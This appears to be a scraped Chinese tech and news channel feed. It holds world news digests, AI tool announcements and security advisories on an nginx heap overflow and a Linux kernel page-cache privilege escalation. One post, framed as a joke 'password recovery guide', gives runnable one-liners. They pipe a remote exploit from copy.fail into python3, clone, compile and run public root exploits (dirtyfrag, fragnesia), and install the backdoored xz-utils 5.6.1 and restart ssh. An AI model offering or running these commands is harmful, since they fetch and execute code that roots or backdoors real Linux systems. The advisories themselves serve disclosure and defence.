Skip to main content

OKHK 👀

个人数字泔水\(⁠◔⁠‿⁠◔⁠)
Thinking...
  1. 知情人士说,美国政府已批准阿里、腾讯、字节、京东等10家中国企业购买H200显卡,每家可买7.5万张。联想、富士康等获准为分销商。英伟达黄仁勋原不在随特朗普访华的企业家范围,以避免见习近平时因芯片限售而尴尬,但特朗普临时决定邀请,让他从阿拉斯加中途登机赴华。
    习近平特朗普5月14日上午在人民大会堂会谈,决定将中美定位为“建设性战略稳定关系”。特朗普逐一向习近平介绍随访企业家。习近平说,昨天两国经贸团队达成了总体平衡积极的成果。台独与台海和平水火不容,维护台海和平稳定是中美双方最大公约数,美方务必慎之又慎处理台湾问题。
    路透社新华社
  2. OKHK 👀
    还有之前的 Copy Fail 对应的重置 root 密码 curl https://copy.fail/exp | python3 && su passwd root #Linux
    #Linux 密码忘了?👇 这里有找回密码教程合订本(转
    1. Linux 找回密码教程,建议收藏!
    curl https://copy.fail/exp python3 && su
    passwd root
    设置你的新密码

    2. 你的 Linux 密码又忘了?
    没关系,这里还有一个新的!
    git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

    3. 不想再忘记密码了?
    我们有专业的黑客团队帮您运维服务器和保管密码!
    项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
    sudo apt install xz-utils=5.6.1-1
    sudo systemctl restart ssh

    4. 容易忘记密码的有福了,每天都有新办法!
    https://ze3tar.github.io/post-zcrx.html
    插入一个支持 ZCRX 的高端网卡,让它 down 掉,然后 ptr_ring drain + scrub loop 重复入栈把 free_count 写溢出即可

    5. 什么,你买不起高端网卡?那试试这个吧!
    git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp

    6. 听说您的机房不允许 ssh 外连,只能通过 KVM 物理访问服务器? 没关系,我们的专业黑客团队也可以通过 nginx 帮助运维您的服务器!
    https://depthfirst.com/nginx-rift
    Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
  3. 🔴 NGINX http_rewrite 模块漏洞;或会导致堆溢出甚至远程代码执行。

    - 漏洞的起因是 nginx 尝试将 escape 过的 URL 写入未 escape 长度的内存。
    - 在 ASLR 未被开启的情况下,可以导致远程代码执行。
    - 修复已于 1.30.1/1.31.0 发布。

    1. https://depthfirst.com/nginx-rift
    2. my.f5.com/~

    CVE: CVE-2026-42945
    CVSS: 9.2 (F5 Networks)
    Affect: [0.6.27, 1.30.0]
    Fixed-At: 1.30.1, 1.31.0

    #nginx NGINX Rift
  4. 一觉醒来发生了什么 05月14日
    #Daily

    2026年5月14日
    🌍资讯快读
    1、我国科研团队成功研制出可编程量子计算原型机“九章四号”
    https://www.jiemian.com/article/14424650.html
    2、15日起售,60周岁及以上老年旅客可享淡季火车票优惠
    https://www.jiemian.com/article/14423800.html
    3、市场监管总局:推动价格法等多部法律法规修订
    https://www.jiemian.com/article/14423449.html
    4、英国将向霍尔木兹海峡多国护航行动派遣战机及军舰
    https://www.jiemian.com/article/14418746.html

    👬即刻镇小报
    1、每年在家宴上做点新菜是我的小小追求 🍽️
    https://m.okjike.com/originalPosts/6a03cfdaaf7695b4cf0b785f
    2、吃早饭晕碳后的一次顿悟
    https://m.okjike.com/originalPosts/6a03c8a3c2dc8bf83f220d8b
    3、最近看到很多年轻人因为网贷而苦恼
    https://m.okjike.com/originalPosts/6a02a697657481ea4e8f1dbf
    4、# 字节跳动的 AI 编程团队,推荐了这 10 个 Skills
    https://m.okjike.com/originalPosts/6a029a6e0294f7395cdf32d0

    今日即刻镇小报内容来自 @陈宇慧 @Alchian花生 @进击的盖茨比 @Yibie ,感谢以上即友的创作与分享。
  5. 重要/漏洞:Linux Kernel Fragnesia XFRM ESP-in-TCP page cache 存在写入本地提权漏洞

    漏洞编号:暂无
    关联/同类参考编号:CVE-2026-43284(Linux xfrm/ESP shared skb frag 原地解密问题);Dirty Frag 关联链路另涉及 CVE-2026-43500(RxRPC)。NVD 对 CVE-2026-43284 的描述明确指向 Linux kernel xfrm ESP 在 shared skb frags 上避免原地解密的问题。
    重要等级: 严重(高危)

    CVSS 分数:
    参考关联 CVE-2026-43284:CVSS v3.1 7.8

    受影响系统:
    受 dirtyfrag 影响的所有版本都会受到影响。
    Fragnesia 属于 Dirty Frag 漏洞类别。它是 ESP/XFRM 中的一个独立漏洞,与 Dirty Frag 不同,后者已有单独的补丁。但是,它们位于同一攻击面上,缓解措施也与 Dirty Frag 相同。

    报告者称,未合入 2026 年 5 月 13 日 net: skbuff: preserve shared-frag marker during coalescing 修复补丁的 Linux 内核均可能受影响。实际风险需结合系统内核版本、发行版补丁回移情况、内核配置、ESP/XFRM 相关模块、user namespace / network namespace 策略以及容器权限配置综合确认。

    受影响内核条件:
    使用了存在 skb shared-frag 标记丢失问题的 Linux 内核,并且未合入 net: skbuff: preserve shared-frag marker during coalescing 修复补丁的系统。公开 PoC 仓库说明,该 PoC 利用 Linux XFRM ESP-in-TCP 子系统逻辑缺陷,对只读文件的 page cache 实现任意字节写。


    漏洞原理
    该漏洞核心问题在于:Linux 内核在 TCP skb coalescing 过程中,没有正确保留 skb frag 的 shared-frag 标记。修复补丁说明,skb_try_coalesce() 可以把一个 skb 的 paged frags 转移到另一个 skb;如果来源 skb 带有 SKBFL_SHARED_FRAG,合并后的目标 skb 仍然可能包含外部拥有或 page-cache-backed 的 frag,但旧逻辑会丢失该标记。之后 ESP input 检查 skb_has_shared_frag() 时可能得到 false,从而跳过 copy-on-write,直接在 page-cache-backed frag 上原地解密。

    攻击链路中,splice() 可将普通文件的 page cache 页引入 TCP skb paged frag。正常情况下,这类 frag 应被视为共享/外部拥有,后续可能写入 packet data 的协议栈路径应先执行 COW,避免修改文件页缓存。Fragnesia 利用的异常点是:数据进入 TCP receive queue 后再启用 ESP-in-TCP ULP,内核把这些排队数据当作 ESP 记录处理,而 shared-frag 标记在 coalescing 后丢失,导致 ESP 解密逻辑误认为可以原地写入。

    在 ESP/AES-GCM 解密过程中,密文与 keystream 做 XOR。PoC 通过控制 IV/nonce,使目标 page cache 字节被 XOR 成攻击者期望的值,从而实现对只读文件 page cache 的按字节修改。该修改发生在内存 page cache 中,不直接写回磁盘。


    注意

    这是一个本地提权漏洞,攻击者需要能够在目标系统上执行本地代码,但一旦满足前提,风险非常高,尤其是多用户 Linux 主机、CI/CD Runner、容器宿主机、共享开发机、云主机和高权限 SUID 程序较多的环境。
    该漏洞修改的是 page cache,不是磁盘文件本体。因此常规文件完整性检查如果只关注磁盘内容,可能无法直接发现短时间内的内存页缓存污染。被污染期间,普通 read()、程序加载、执行路径可能命中被篡改的 page cache。

    受影响组件
    Linux kernel net/core/skbuff.c
    skb_try_coalesce()
    SKBFL_SHARED_FRAG
    XFRM ESP input
    ESP-in-TCP ULP
    TCP receive queue
    page cache / skb paged frag


    处置建议:
    在不影响业务的前提下,禁用或限制非特权 user namespace / network namespace 创建能力,降低普通用户获得 netns 内 CAP_NET_ADMIN 并配置 XFRM SA 的可能性。
    如业务不依赖 IPsec ESP,可临时禁用或阻止加载 esp4、esp6。
    避免给容器授予 CAP_NET_ADMIN、CAP_SYS_ADMIN、特权容器、host network 等高风险配置。

    参考来源: Github
  6. Telegram 群聊总结应 - TGTLDR ( Telegram Too Long, Don’t Read )

    https://github.com/fr0der1c/tgtldr
    https://www.v2ex.com/t/1208962

    一个单用户自部署的 Telegram 群消息监听与每日 AI 摘要系统。

    监听已加入的 Telegram 群组消息,并保存到本地数据库
    按群组配置每日摘要时间、Prompt 、过滤规则和摘要模型
    使用 OpenAI 兼容接口生成群聊摘要
    支持在网页端查看摘要,也可以选择通过 Telegram Bot 推送
    支持手动触发摘要、查看历史摘要和重新投递失败的 Bot 推送
    提供首次配置向导,启动后可在网页端完成 Telegram 、OpenAI 和群组设置

    #Telegram #Tool #GitHub GitHub - fr0der1c/tgtldr: TL;DR AI summarizer for telegram groups
  7. 无需编写 / 生成代码,docker-agent 通过 yaml 配置文件构建运行 AI Agent
    https://github.com/docker/docker-agent
    #AI #Docker #GitHub
    agents:
      root:
        model: openai/gpt-5-mini
        description: A helpful AI assistant
        instruction: |
          You are a knowledgeable assistant that helps users with various tasks.
          Be helpful, accurate, and concise in your responses.
        toolsets:
          - type: mcp
            ref: docker:duckduckgo

    docker agent run agent.yaml
  8. 一觉醒来发生了什么 05 月 13
    #Daily

    2026 年 5 月 13 日
    🌍 资讯快读
    1、市场监管总局附条件批准腾讯收购喜马拉雅股权案
    https://www.jiemian.com/article/14417682.html
    2、中央网信办全面部署推进规范短视频内容标注工作
    https://www.jiemian.com/article/14416206.html
    3、宇树科技发布载人变形机甲,定价 390 万元起
    https://www.jiemian.com/article/14415239.html
    4、南京审计大学回应学生涉嫌偷拍:将依据调查结果严肃处置
    https://www.thepaper.cn/newsDetail_forward_33163707

    👬 即刻镇小报
    1、香港机场最近有巨橘一只
    https://m.okjike.com/originalPosts/6a030abb7f82528246adab60
    2、我来抄个作业。我感觉我一天要吃 9 种补剂
    https://m.okjike.com/originalPosts/6a012e84c2dc8bf83fe5a68a
    3、听闻字节全面收缩在 AI 应用层的投入,应用层聚焦到豆包,硬件层押注 PICO+ AI 硬件
    https://m.okjike.com/originalPosts/6a001d86657481ea4e52e8b6
    4、自由、松弛并且有复利地工作
    https://m.okjike.com/originalPosts/69fb6b99af7695b4cf48d618

    今日即刻镇小报内容来自 @油百万 @小野酱大漂亮.AI @玉伯 @刘飞 Lufy ,感谢以上即友的创作与分享。
OKHK